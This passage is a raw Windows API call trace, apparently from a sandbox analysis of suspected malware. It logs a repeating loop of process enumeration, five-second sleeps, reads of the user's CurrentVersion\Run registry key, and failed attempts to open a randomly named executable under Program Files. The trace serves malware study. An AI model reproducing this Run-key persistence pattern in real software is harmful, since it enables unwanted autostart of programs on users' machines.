(ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0286.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0286.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0286.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0286.469] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0286.470] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0286.472] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0286.472] NtClose (Handle=0x338) returned 0x0 [0286.472] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.473] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0286.473] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deba0) returned 1 [0286.473] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.473] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0286.473] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0286.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0286.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0286.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0286.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0286.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0286.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0286.623] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0286.625] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0286.626] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0286.626] NtClose (Handle=0x338) returned 0x0 [0286.626] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.626] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0286.626] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0286.626] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.626] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0286.626] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0286.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0286.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0286.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0286.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0286.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0286.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0286.769] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0286.770] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0286.771] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0286.772] NtClose (Handle=0x338) returned 0x0 [0286.772] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.772] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0286.772] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0286.772] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.772] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0286.772] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de2a0) returned 1 [0286.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0286.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0286.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0286.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0286.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0286.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0286.898] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0286.899] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0286.900] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0286.901] NtClose (Handle=0x338) returned 0x0 [0286.901] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.901] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0286.901] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deba0) returned 1 [0286.901] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.901] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0286.901] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5dec20) returned 1 [0286.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0286.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0286.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0286.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0286.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0287.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0287.005] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0287.006] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0287.006] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0287.006] NtClose (Handle=0x338) returned 0x0 [0287.006] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.006] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.007] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de4a0) returned 1 [0287.007] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.007] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.007] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0287.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0287.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0287.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0287.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0287.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0287.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0287.118] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0287.119] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0287.121] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0287.121] NtClose (Handle=0x338) returned 0x0 [0287.121] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.121] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.121] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deba0) returned 1 [0287.121] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.121] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.121] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0287.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0287.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0287.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0287.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0287.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0287.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0287.224] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0287.226] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0287.227] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0287.227] NtClose (Handle=0x338) returned 0x0 [0287.227] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.227] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: 